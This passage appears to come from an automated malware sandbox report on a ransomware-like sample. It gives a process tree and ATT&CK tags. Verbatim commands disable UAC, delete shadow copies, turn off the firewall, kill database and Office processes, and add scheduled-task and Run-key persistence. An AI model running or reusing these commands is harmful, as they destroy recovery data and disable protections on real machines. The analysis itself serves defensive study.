C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1060
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:688
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1396
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:580
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1588
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:972
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:840
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:968
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1872
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1360
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1656
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
PID:560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵PID:1776
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:964
-
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵PID:1612
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:1160
-
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes2⤵PID:556
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:856
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:772
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:460
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵PID:2020
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵PID:624
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵PID:1572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
PID:268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Kills process with taskkill
PID:292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
- Kills process with taskkill
PID:964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
PID:1044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
- Kills process with taskkill
PID:1776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
PID:1612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
PID:1728
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
PID:1664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
PID:1060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
- Kills process with taskkill
PID:460
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
- Kills process with taskkill
PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
PID:2028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
PID:624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
- Kills process with taskkill
PID:1524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
- Kills process with taskkill
PID:1520
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
PID:864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
- Kills process with taskkill
PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
- Kills process with taskkill
PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
PID:1272
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
PID:688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
PID:580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
- Kills process with taskkill
PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f® delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f2⤵PID:1708
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f3⤵
- Modifies registry key
PID:672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f® add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f2⤵PID:564
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:1732
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f3⤵
- Adds Run key to start application
PID:1944
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:796
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1916
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt1⤵PID:1060
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ReadMe_Now!.hta"1⤵PID:1916
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1File Deletion
2Modify Registry
3